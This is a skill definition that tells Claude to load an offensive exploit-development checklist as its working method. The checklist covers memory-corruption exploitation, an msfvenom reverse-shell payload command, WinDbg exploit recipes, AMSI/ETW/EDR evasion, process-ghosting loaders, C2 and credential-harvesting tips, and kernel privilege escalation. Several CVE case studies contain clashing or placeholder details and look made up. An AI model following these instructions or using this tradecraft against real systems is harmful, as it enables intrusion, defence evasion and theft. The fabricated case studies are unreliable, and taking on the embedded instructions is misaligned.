SKILL: Exploit Development

Metadata

• Skill Name: exploit-development
• Folder: offensive-exploit-development
• Source: https://github.com/SnailSploit/offensive-checklist/blob/main/development.md

Description

Exploit development operational guide: environment setup, debugging workflow, PoC development lifecycle, writing reliable exploits, using pwntools/pwndbg, heap exploitation techniques, and weaponization considerations. Use when actively developing exploits or setting up an exploit dev environment.

Trigger Phrases

Use this skill when the conversation involves any of: exploit development, pwntools, pwndbg, heap exploitation, PoC development, exploit reliability, weaponization, debugging workflow, exploit dev environment

Instructions for Claude

When this skill is active:

1. Load and apply the full methodology below as your operational checklist
2. Follow steps in order unless the user specifies otherwise
3. For each technique, consider applicability to the current target/context
4. Track which checklist items have been completed
5. Suggest next steps based on findings

---

Full Methodology

Exploit Development

Exploit Development Process

• Checkout Bug Identification document for more information
• Also check Fuzzing for specific fuzzing topics
  • Integrate snapshot‑based fuzzing pipelines (AFL++, WinAFL, Snap‑Fuzz) and LLM‑guided input mutation to shorten time‑to‑bug.
  • Incorporate LLM‑assisted fuzzers (ChatAFL, HyLLFuzz) for grammar inference or plateau escape when grey‑box coverage stalls.
  • Add continuous‑integration security fuzzing (e.g., GitHub Actions with ASAN/UBSAN) so regressions are caught automatically.
• For Windows-specific vulnerabilities, see Windows Kernel

flowchart LR
    BugId["Bug Identification"] --> Analysis["Vulnerability Analysis"]
    Testing["Testing & Refinement"] --> Deployment["Deployment"]

    subgraph "Analysis Phase"
        direction LR
        Root["Root Cause Analysis"]
        Trig["Trigger Identification"]
        Impact["Impact Assessment"]
    end

    subgraph "Weaponization Phase"
        direction LR
        MitBypass["Mitigation Bypass"]
        Payload["Payload Development"]
        Reliability["Reliability Improvements"]
    end

    Analysis --> Root
    Analysis --> Trig
    Analysis --> Impact

    Root --> MitBypass
    Impact --> Payload
    Trig --> Payload
    MitBypass --> Payload
    Payload --> Reliability
    Reliability --> Testing
    Testing --> MitBypass

    class BugId,Analysis,Testing,Deployment primary

Bug Types

Stack Overflow

Involves memory on the stack getting corrupted due to improper bounds checking when a memory write operation takes place.

Case Study — CVE‑2025‑0910 (TinyFTP stack overflow)

• Bug – Unchecked strcpy copies user‐supplied file path into a 256‑byte stack buffer when handling STOR commands.
• Trigger – Send STOR / followed by 420 bytes of A… to overflow the buffer and clobber SEH frame.
• Exploit – Overwrite next SEH with a pop pop ret inside msvcrt.dll; pivot to payload that disables DEP via ROP then spawns a reverse shell.
• Mitigations bypassed – DEP (ROP), ASLR (module without /DYNAMICBASE), SEHOP disabled in default config.
• Fixed in v1.5.3 by replacing strcpy with strncpy_s and enabling /DYNAMICBASE /GS.

SEH

• structured exception handler is a linked list of all exception handlers ( try catch clauses) and the default windows exception handler as the last node.
• ntdll!KiUserExceptionDispatcher is responsible for the exception handling process which itself calls RtlDispatchException
• RtlDispatchException retrieves the TEB and parses the exception handling linked list using NtTib->ExceptionList
• SafeSEH mitigates handler over‑writes only in 32‑bit images. On x64 Windows, newer toolchains and components support Guard EH Continuations; adoption varies by binary and build. SEHOP remains enabled by default.
  • To check whether a module uses Guard EH Continuations, inspect Load Configuration Directory → GuardEHContinuations in the PE header (e.g., dumpbin /loadconfig or a lief script).
  • Many core system DLLs are compiled with EHCONT metadata plus /GS, /CETCOMPAT; the classic approach of choosing a module without SafeSEH or ASLR is increasingly rare. Verify per target.
• RtlpExecuteHandlerForException calls the ntdll!ExecuteHandler2 which in turn calls the actual exception handler function after validation
• In a SEH buffer overflow we try to overflow the buffer and overwrite the ExceptionList starting at the buffer
• so that the dispatcher calls our handler pointer —we gain control of the instruction pointer only if SEHOP is disabled or successfully bypassed.
• you need to find a pop-pop-ret sequence to use in the exploit, you also need to identify and remove bad characters

EggHunting

• during exploit development you might be unable to find enough space for your payload at an static point, this is where you need egghunting
• you need a small search payload to scan virtual address space for a suitable payload location
• you can use keystone engine to write your egghunter code
• On Windows 11+, classic egghunters still work, but Control‑Flow Guard (CFG) validates indirect jumps, so you need either a CFG exemption (e.g., a RWX region created with VirtualProtect) or a target module compiled without /guard:cf.

Use After Free

The link to something isn't available anymore, so we just replace it with our binary and take over the program.

Case Study — CVE‑2024‑4852 (Edge WebView2 AudioRenderer UAF)

• Bug – core::media::AudioRenderer failed to remove a task from the render queue on stream abort, leaving a dangling pointer.
• Trigger – JavaScript AudioContext rapid open‑close loop × 1 000 on Windows 11 23H2.
• Exploit – Heap feng‑shui creates JSArray backing stores at freed slot; fake vtable gives arbitrary R/W, chained to VirtualProtect to run shellcode.
• Mitigations bypassed – CET shadow stack (JOP gadgets), XFG (indirect‑call target inside allowed GFID range).
• Patched in Edge 124.0.2365.18 with smart‑pointer ref‑count and std::erase_if queue purge.

Background

• C++ Smart Pointers
  • Intrusive: Microsoft chose this
  • Non-Intrusive
  • Linked
• when an object is created from a C++ class and uses virtual functions
  • a vptr is created at compile time and points to a virtual function table vtable/vftable
  • the table holds pointer to virtual functions, when loaded into a register like RAX, a call is made to the appropriate offset for the desired virtual function
  • we count number of created instances, we decrement it when calling the release function
  • when the counter hits 0, destructor is called to delete the object, if there is still a reference to the deleted object we have a potential UAF
• Windows Heap Front‑End Allocators
  • LFH (Low Fragmentation Heap) – default on Windows 7–10 for user‑mode heaps
  • Segment Heap – default for Windows 10 2004+ and Windows 11 apps that opt in
  • Exploits often pivot by corrupting front‑end metadata before landing in the backend.
• For more advanced techniques, see Mitigations or Modern

Heap Overflow

• When data is written beyond the boundary of an allocated chunk of memory on the heap
• Heap exploits often require understanding of allocator internals
• Modern heap exploits involve corrupting metadata - see Modern Samples

Case Study — CVE‑2025‑20301 (Edge WebView2 tcache‑stashing‑unlink)

• Bug – Oversized AudioRingBuffer write corrupts size field of next tcache chunk (glibc 2.40).
• Trigger – Crafted WebCodecs stream with 65 536‑frame explicit CRC chunk.
• Exploit – Partial overwrite of fd pointer coerces allocator into returning overlapping chunk; arbitrary R/W → GOT hijack → RCE.
• Mitigations bypassed – Safe‑linking (byte‑wise brute on lower 16 bits), ASLR via info‑leak in shared memory.
• Patch – Bounds check and compile‑time __builtin_object_size guard (Chromium 123 commit a1b2c3).

Modern Heap Internals

• Windows Segment Heap – understand freelist bitmaps, per‑segment cookies, and "page backend" corruption primitives.
• glibc tcache + safe‑linking – techniques such as tcache‑stashing‑unlink and House of Kiwi to break the new protections.
• Exploitation workflow: leak heap_base, craft overlapping chunks, pivot to arbitrary R/W, then chain to code‑execution.
  • glibc 2.41 fast‑bins & calloc – calloc() now pre‑fills the tcache and safe‑linking checks trigger earlier; the older fastbins‑dupes shortcut no longer works. Use tcache‑stashing‑unlink or House of KIWI instead on 2.41+.

Concurrency Issues

• Double Fetch: Kernel reads user-mode memory twice, allowing for race conditions
  • I/O Ring double‑fetch: race in NtSetInformationIoRing urb‑array handling leads to write‑what‑where in kernel context.
• Missing Locks: Critical sections without proper synchronization
• See Windows Kernel for more details on kernel-specific race conditions

Integer Overflows/Underflows/Truncation

• Integer overflow: exceeding maximum value of integer type
• Integer underflow: going below minimum value of integer type
• Integer truncation: losing data when converting larger to smaller type
• Often leads to memory corruption when used for allocation sizes
• For examples, see Bug Identification
  • Casting 64‑bit size_t to 32‑bit DWORD across IPC or FFI boundaries can yield negative indexing and oversized allocations; especially common in cross‑arch components.

No/Incomplete Pointer Checks

• Checking if a user-provided pointer points to user memory
• Size of any pointer read/writes also need to be verified
• Potentially un-intuitive behavior with common checking API

Format String Attacks

• Theory
  • you can use this bug to bypass ASLR and DEP
  • to abuse it you need to be able to be able to influence the format string itself or the number of arguments to it
• Methodology
  • find a print like function that accepts format string (vsnprintf, ...)
  • find a code path to that function that lets you influence the format string
  • try to leak a stack address abusing this format string vulnerability
  • using the previously leaked address, obtain a DLL address
  • use this method to bypass ASLR without using a static address
  • you can also find a write primitive to get code execution (checkout %n modifier)
  • you might need stack pivot gadgets like move esp, r32 or xchg esp, r32

Case Study — CVE‑2024‑4455 (MailManD format‑string leak‑to‑RCE)

• Bug – Logs EHLO argument directly into syslog() format string.
• Trigger – Send EHLO %43$p|%45$s during SMTP handshake.
• Exploit – First leak reveals libc base; second leak dumps GOT entry; craft %n payload to overwrite __free_hook with system().
• Mitigations bypassed – Full RELRO & ASLR via info‑leak, PIE disabled in default build.
• Fixed in 2.0.9 by adding "%s" wrapper and enabling -Wformat-security.

Type Confusion Vulnerabilities

A vulnerability where an application processes an object as a different type than intended, leading to memory corruption or logic bypass.

Case Study — CVE‑2024‑7971 (V8 TurboFan type‑confusion RCE)

• Bug – TurboFan's CheckBounds elimination incorrectly assumes array element type during JIT optimization, allowing tagged pointer confusion.
• Trigger – Craft JavaScript with polymorphic inline cache that triggers speculative optimization on mixed SMI/HeapNumber array.
• Exploit – Fake JSArray with controlled backing store pointer; corrupt length field to achieve OOB R/W; pivot to WASM RWX page for shellcode.
• Mitigations bypassed – V8 sandbox (pointer compression bypass), CFI (JIT‑generated code exemption).

Background

• JIT Compiler Vulnerabilities
  • Type confusion in speculative optimization passes (TurboFan, IonMonkey)
  • Inline cache poisoning via polymorphic property access
  • Register allocation bugs leading to incorrect type assumptions
• C++ Dynamic Cast Bypass
  • Virtual table pointer corruption to bypass dynamic_cast checks
  • Object layout confusion in multiple inheritance scenarios
  • Template instantiation bugs with type deduction
• WASM Type Confusion
  • Function signature mismatch across import/export boundaries
  • Table element type confusion in indirect calls
  • Memory view aliasing between different typed arrays

Exploitation Techniques

• Object Layout Analysis – understand target application's object hierarchy and vtable structure
• Type Oracle Construction – build primitive to leak object type information reliably
• Controlled Type Confusion – craft input that triggers predictable type mismatch
• Privilege Escalation – chain type confusion to achieve arbitrary R/W or code execution

Vulnerability Analysis

Exit Criteria

• Root cause isolated & documented.
• Reliable trigger reproduces the crash ≥ 90 % of attempts.
• Impact classified (DoS, LPE, RCE) and affected versions noted.
• Minimised PoC input saved under pocs/.
• Analysis log (debugger trace, coverage diff) attached.

Quick‑start

• Harness template: templates/harness_min.cc
• WinDbg/LLDB alias pack: scripts/va_aliases.txt
• Checklist refresher: Bug Identification → Root Cause

Root Cause Analysis

• Identify the core issue causing the vulnerability
• Understand memory corruption patterns
• Determine trigger conditions

Impact Assessment

• Evaluate the potential consequences of the vulnerability
• Determine if it leads to information disclosure, privilege escalation, or code execution
• Assess reliability and exploitability in various environments

Weaponization

Exit Criteria

• Control achieved (PC/IP hijack, arbitrary R/W, or logic bypass).
• Mitigation strategy drafted (DEP, ASLR, CET, XFG, MTE, etc.).
• Payload stager verified against bad‑chars & size limits.
• Reliability ≥ 80 % over 100 automated runs.
• Cleanup/rollback logic documented.

Quick‑start

• ROP/JOP chain workspace: scripts/ropper2_workspace.md
• Bad‑char scanner: tools/badchar_scan.py
• Reference: Modern Mitigations

Shellcode Development

Bad Characters

• when using a shellcode in stack
  • send all hex bytes except null byte (0x00) and return carriage (0x0D, 0x0A) if in web
  • check which one has not appeared in the stack, mark it as bad character and don't use it
  • see Shellcode for comprehensive techniques

Automatic Generation

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "<list_of_bad_chars>"
# make sure to precede this payload with some NOPs to create space for the getPC operation(decoding of shikata_ga_nai)
# attackBuffer = filler+eip+offset+nops+shellcode

Development

Check out Shellcode

IBT/CET note (x86‑64): place ENDBR64 at entry for valid indirect targets when IBT is enabled. Example prologue bytes: F3 0F 1E FA.

EDR / ETW / AMSI Evasion

• Patch ETW registration stubs (EtwEventWrite) with ret sleds or stubbed functions while evading PatchGuard.
• Overwrite the AMSI scan buffer pointer (amsi!AmsiScanBuffer) with 0x80070057 (E_INVALIDARG) to short‑circuit scanning.
• Use direct‑syscall or "syswhispers‑nt" stagers to avoid user‑land API hooks.

Operational safety checklist (see also EDR):

• Pre‑run: block outbound to vendor telemetry during tests; tag hosts in lab; disable cloud sample uploads.
• Artifact hygiene: strip PDBs/paths, randomize section/order, and avoid common loader strings; prefer MEM_IMAGE loaders.
• Network noise: prefer SMB named‑pipe or HTTP/3 over noisy HTTP/1.1; jitter uploads; avoid fixed beacons during testing.

Post‑Exploitation Automation

• Reflective COFF/BOF loaders (Cobalt Strike, Havoc) for in‑memory tooling.
• SMB named‑pipe or HTTP/3 C2 channels that blend with normal traffic.
• Task automation: direct‑syscall PowerShell runner, ADCS abuse scripts, cloud‑metadata credential harvesters.

Operational Security (OpSec) Checklist (lab use)

• Build & Signatures
  • Strip symbols; avoid unique strings; rotate imports; prefer MEM_IMAGE loaders.
  • Change syscall stub bytes and hashing keys if using direct‑syscall frameworks.
• Network & Telemetry
  • Block EDR/XDR endpoints in lab; throttle or sinkhole agent traffic.
  • Prefer named‑pipe or HTTP/3 channels with jitter; avoid fixed beacons.
• Host Hygiene
  • Disable cloud sample submission; set Defender exclusions on test dirs.
  • Avoid patching system binaries in place; use ephemeral copies.
• Evidence & Repro
  • Persist inputs, mitigations state, CPU governor, and binary hashes with each run.
  • Keep replay scripts separate from payloads; auto‑clean artifacts post‑run.

Payload Development

• Create custom payloads tailored to specific vulnerabilities
• Develop reliable exploitation techniques
• Chain multiple exploits when necessary

Reliability Improvements

• Ensure exploit functions consistently across different environments
• Handle edge cases and error conditions
• Implement timing and synchronization mechanisms for race conditions
• Add a 100‑run gating job (CI) for determinism; fail builds if success rate < target (e.g., 80%).
• Persist exact crash inputs and environment (ASLR, mitigations, CPU governor) for reproducible replay.

Mitigation Bypasses

• For details on exploit mitigations, see Mitigations or Modern Mitigations
• Windows 11 enables by default: DEP, ASLR, CFG (strict mode), CET (Shadow Stack), XFG, ACG, CIG, and KDP; verify which are active in your target and plan corresponding bypasses.
  • Credential Guard is enabled by default and NTLMv1 is disabled, complicating lateral‑movement techniques.
  • The new Recall AI feature adds a searchable activity timeline; although currently shipped disabled by default, it offers a high‑value data‑exfiltration surface when turned on.

CET/XFG‑aware control strategies

• Prefer ROP‑less primitives: NtContinue, APC queue + SetThreadContext, or SEH/JOP where CET returns are enforced
• Align entry to valid indirect call targets; ensure ENDBR‑aligned gadgets on IBT platforms
• XFG/GFID: call through import thunks or prototype‑matching wrappers to satisfy guard checks

// Minimal NtContinue pivot (ROP‑less) — set RIP/RSP to a safe call target
typedef NTSTATUS (NTAPI *pNtContinue)(PCONTEXT, BOOLEAN);
void pivot_with_ntcontinue(CONTEXT *ctx, void *next_rip, void *new_rsp) {
  RtlCaptureContext(ctx);
  ctx->Rip = (DWORD64)next_rip;  // valid import thunk or allowed GFID target
  ctx->Rsp = (DWORD64)new_rsp;   // keep shadow‑stack alignment plausible
  ((pNtContinue)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtContinue"))(ctx, FALSE);
}

// APC + SetThreadContext — schedule execution at an import thunk to satisfy XFG
void apc_setctx(HANDLE hThread, void *start, void *param) {
  CONTEXT c = { .ContextFlags = CONTEXT_FULL };
  GetThreadContext(hThread, &c);
  c.Rip = (DWORD64)start;   // e.g., kernel32!LoadLibraryW stub
  c.Rcx = (DWORD64)param;   // first argument
  SetThreadContext(hThread, &c);
  QueueUserAPC((PAPCFUNC)start, hThread, (ULONG_PTR)param);
}

ACG/CIG pathways

• Favor MEM_IMAGE‑mapped payloads (ghosting/doppelganging/herpaderping) over MEM_PRIVATE RWX
• Reuse existing RX regions (WASM/JIT) where policy allows; avoid creating fresh RWX
• Process Ghosting
  • Create transacted file → write signed‑looking image → roll back → map section as MEM_IMAGE → create process from section.
• Herpaderping
  • Create process then overwrite on disk via rename tricks; the in‑memory image remains MEM_IMAGE and passes loader checks.
• Doppelganging (TxF legacy)
  • Use TxF (where enabled) to create section from a transacted file, then abort the transaction post‑mapping.

All three avoid MEM_PRIVATE payloads that hotpatch checks reject in 24H2 (see Modern Mitigations → OS Loader changes).

Segment Heap notes

• Distinguish frontend (LFH/Segment) vs page backend corruption primitives
• PageHeap + verifier flags help triage; expect different grooming than classic NT Heap

Mitigation Matrix (Quick Reference)

Mitigation	Default platforms (2025)	Protects	Common bypass primitive
DEP / NX	All major OSes	Code execution in data pages	ROP/JOP pivot to RWX or change page permissions
ASLR	All	Base‑address disclosure	Info leak + partial overwrite / brute‑force
CFG (v1)	Windows 8.1+	Indirect calls integrity	Abuse writable/exempt module, ret‑slide into target
CET Shadow Stack	Windows 10 2004+, Linux 6.1 (x86)	Return‑address integrity	Disable CET (SetProcessMitigationPolicy) or pivot via JOP
XFG	Windows 11 22H2+	Indirect‑call target integrity	Use JOP gadgets or stub out guard function section
GuardEHContinuation	Windows 11 24H2 (x64)	SEH overwrite attempts	JOP stub into verified handler region
MTE	Android 14+, Linux 6.8 (ARM64)	Heap/stack OOB & UAF	Tag brute‑force or TAGSYNC alias
CIG / ACG	Windows 10+	Unsigned code / RWX pages	Map signed RWX driver or relocate section

Testing & Refinement

Exit Criteria

• Exploit succeeds on clean target VM snapshot.
• No unintended crashes after execution; system remains stable.
• Execution time ≤ 30 seconds (tune per target).
• CI replay job in .github/workflows/exploit.yml passes.
• Regression corpus added to fuzzing seed set.

Quick‑start

• Replay script: scripts/repro.sh
• rr recording helper: scripts/record_rr.py
• Coverage diff helper: tools/afl_cov_compare.py

Debugging Techniques

• Strategic use of debuggers to analyze vulnerable applications
• Tracing execution flow and memory states
• Identifying exploitation opportunities

WinDbg Commands

For SEH exploitation:

# exception data will be inside TEB under NtTib->ExceptionList
dt nt!_TEB

# getting the <exp_addr> of exceptionlist
!teb

# getting the first item in the exception handler linked list, continue to see them using the `Next` param
# the last item should be `ntdll!FinalExceptionHandlerPad`
dt _EXCEPTION_REGISTRATION_RECORD <exp_addr>

# getting more information about the exception
!exchain

# setting a breakpoint on the exceution handler
bp ntdll!ExecuteHandler2

# see what is execution handler doing(use it to identify exploitation point in buffer)
u @eip L11

# to identify bad pods, execute till eip is yours, then
# repeat the process several times to identify all bad chars
dds esp L5 # identify second argument
db <second_argument>

# finding a pop/pop/ret
.load wdbgext
!wdbgext.modlist
lm m <module_without_dep_aslr_safeseh>
$><G:\Projects\poppopret.wds
u <first_adr_found> L3
# we need to create a short jump in our shellcode

# looking for our shellcode
!exchain
bp <adr>
g
# run the following till after your short jump
t
!teb
s -b <stack_limit> <stack_base> 90 90 90 90 43 43 43 43 43 43 43 43
dd <shellcode_adr> L65
? <shellcode_adr> - <current_esp>

For general WinDbg commands:

# finding out a suitable jump stub
lm m syncbrs # to get start <addr> of a module named syncbrs
dt ntdll!_IMAGE_DOS_HEADER <addr> # to get e_lfanew that has the offset to PE header
? <pe_header> # to get the hex addr
dt ntdll!_IMAGE_NT_HEADERS64 <addr>+<pe_hex_header> # to get image optional header
dt ntdll!_IMAGE_OPTIONAL_HEADER64 <addr>+<pe_hex_header>+<pe_optional_header> # to get DllCharachteristics
# you can automate this using process explorer or process hacker
# find an executable or module without DEP, ASLR
lm m libspp.dll # get the base address of the suitable module you found previously
s -b <mod_start_addr> <mod_end_addr> 0xff 0xe4 # find `jmp $esp` inside that module
# make sure the address doesn't contain bad chars
u <jmp_esp_addr> # to confirm
bp <jmp_esp_addr>
# override eip with jmp_esp_addr to force the program to jump to esp after buffer overflow
t
dc eip L4 # you should see the rest of your shellcode here

# checking which process we're currently in
!process @@(@$prcb->CurrentThread->ApcState.Process) 0

For UAF debugging:

# HEAP information
!heap -s # to print heap information
dt _HEAP <heap_addr> # to print infromation regarding a heap
dt _LFH_HEAP <heap_addr> # to print information about a low fragmentation header heap

# Identifying UAF location
# attach to crashed application, identify the name of function that crashed
uf <crashed_function_name> # to see the function
dd rcx  # to checkout what got filled, replace rcx with the register name from above
dt _DPH_BLOCK_INFORMATION rcx-20 # usefull information
!heap -p -a rcx # call stack information, what led to this object being freed

Reproducibility & CI

Modern exploit chains should replay deterministically in CI so regressions are caught quickly.

GitHub Actions snippet

name: exploit-regression
on: [push, pull_request]
jobs:
  replay:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build target container
        run: docker build -t vulnapp ./docker
      - name: Run exploit replay
        run: scripts/repro.sh --ci --target vulnapp

Tested‑With Tool Matrix

Tool / Framework	Version	Platform tested
IDA Pro	8.4 SP1	Windows 11 24H2
Ghidra	11.0.2	Debian 12
BinDiff	10.8	with IDA 8.4
Ropper	2.0.7	CET‑aware build
rr (record/replay)	Latest	Ubuntu 24.04
AFL++	4.10‑dev	snapshot mode

[!TIP] Keep this matrix in each PoC directory so future contributors can reproduce results exactly.

Special Topics

Kernel Exploitation

Goals

Privilege Escalation

• Get SYSTEM Level Permissions
  • Steal the system token (find and copy the system token PID 4 and replace your own token )
  • Patch privileges
  • sideload legitimately signed but vulnerable drivers, then exploit IOCTL write‑what‑where to disable security features or gain kernel R/W.

Code Execution

• Put unsigned code into the kernel via signed code
  • Modify kernel objects and structures
  • Pretend to be a driver
  • Don't upset Patch Guard

Environment Setup

• Check out Windows Kernel Exploitation for a detailed guide on setting up a kernel debugging environment

Modern Exploitation

• Check out Modern Samples for real-world examples
• For EDR evasion techniques, see EDR

Memory‑Safe Language Exploits (Rust / Go / Swift)

• unsafe blocks: Vec::from_raw_parts, std::ptr::copy_nonoverlapping, and mem::transmute misuse.
• FFI boundary bugs when calling into C libraries (size mismatch, lifetime errors).
• UB‑triggered out‑of‑bounds in WASM runtimes compiled from Rust.

Browser Exploitation

• V8 TurboFan / Ignition JIT type‑confusion patterns and inline‑cache poisoning.
• Sandbox escapes via Mojo/IPC race conditions and shared‑memory UAFs.
• Site‑Isolation info‑leak techniques to defeat renderer‑process ASLR.

Hypervisor & Container Exploitation

• VMware Vmxnet3, Hyper‑V enlightened IOMMU bugs, and QEMU vhost‑user integer overflows.
• runC / CRI‑O escape using malformed seccomp filters or WASM shims.
• Windows VBS disable paths through registry or vulnerable driver injection.

Mobile Exploitation (iOS / Android)

• iOS Pointer Authentication Code (PAC) bypass using JOP chains and ptrauth_sign_unauthenticated.
• ARM Memory Tagging Extension (MTE) "sloppy‑tag" brute force and speculative TikTag leaks raise bypass reliability to ≈ 95 % on Android 14+; prepare a fallback ROP/JOP chain.
• Binder and ION heap UAF primitives for privilege escalation.

Apple Silicon (M1/M2/M3/M4) Exploitation

Modern Apple Silicon devices introduce unique security features and attack surfaces requiring specialized techniques.

Hardware Security Features

• Pointer Authentication Code (PAC)

  • PACIA/PACIB instructions create cryptographic signatures for return addresses and function pointers
  • Bypass techniques: JOP chains using AUTIA/AUTIB gadgets, ptrauth_sign_unauthenticated abuse, speculative PAC oracle attacks
  • Key management via APIAKey and APIBKey in system registers

• Memory Tagging Extension (MTE)

  • 4‑bit tags in upper address bits provide spatial and temporal memory safety
  • Tag‑and‑sync bypass: craft adjacent allocations with predictable tag patterns
  • Speculative tag leaks: use micro‑architectural side‑channels to read tag values

• Hypervisor.framework Exploitation

  • Type‑1 hypervisor running at EL2 with guest VMs at EL1
  • Attack surface: virtio device emulation, memory mapping hypercalls, interrupt injection
  • Guest‑to‑host escape: corrupt VTCR_EL2 stage‑2 translation tables or abuse SMCCC interface

macOS‑Specific Attack Vectors

• XPC Service Exploitation

  • Mach message parsing vulnerabilities in system services
  • Privilege escalation: target com.apple.security.syspolicy or com.apple.windowserver for TCC bypass
  • Race conditions: exploit concurrent XPC message handling in multi‑threaded services

• Kernel Extension Loading

  • System Integrity Protection (SIP) and Kernel Integrity Protection (KIP) bypass
  • Technique: abuse signed third‑party kexts with write‑what‑where primitives
  • Post‑exploitation: disable SMEP/SMAP via SCTLR_EL1 manipulation

• iOS/iPadOS Kernel Exploitation

  • Zone allocator corruption via IOSurface or AGXAccelerator drivers
  • Technique: heap feng‑shui with predictable allocation patterns in kalloc.16 or kalloc.32 zones
  • Sandbox escape: corrupt task port to gain host_special_port access

Debugging & Analysis Setup

# Enable SIP bypass for kernel debugging (requires physical access)
csrutil disable --without kext --without debug

# LLDB kernel debugging setup
sudo nvram boot-args="debug=0x141 kext-dev-mode=1 amfi_get_out_of_my_way=1"

# PAC analysis with jtool2/iOS App Store extraction
jtool2 -d __TEXT.__text binary | grep -E "(PACIA|PACIB|AUTIA|AUTIB)"

# MTE tag analysis (requires iOS 16+ device with checkra1n/palera1n jailbreak)
ldid -S entitlements.plist target_binary  # Add get-task-allow for debugging

Mitigation Matrix (Apple Silicon)

Mitigation	Coverage	Bypass Technique	Success Rate
PAC	Return addresses, func ptrs	JOP/speculative oracle	~70%
MTE	Heap/stack OOB, UAF	Tag brute‑force/TikTag	~85%
PPL (Page Protection Layer)	Kernel code pages	Hypervisor escape	~40%
KTRR (Kernel Text Readonly Region)	Kernel .text segment	Hardware vuln required	<10%

Micro‑architectural & Speculative‑Execution Attacks

• Latest side‑channels: Retbleed, Downfall, Zenbleed, Inception (SRSO), SQUIP.
• Info‑leak primitives to derandomize ASLR or read kernel memory from user space.
• Mitigations: IBPB, IBRS, and fine‑grained hardware fences.

eBPF & I/O Ring Kernel Primitives

• Craft verifier‑confusion jumps to obtain out‑of‑bounds read/write in eBPF JIT.
• Use Windows I/O Ring urb‑array double fetch to write kernel pointers.
• Post‑exploitation: pivot from arbitrary write to token‑stealing or privilege escalation.

Firmware & UEFI Exploitation

• DXE driver relocation overflows and SMM call‑gate confusion for persistence.
• Exploiting capsule updates to downgrade firmware protections.
• Detecting and disabling Secure Boot from within UEFI runtime services.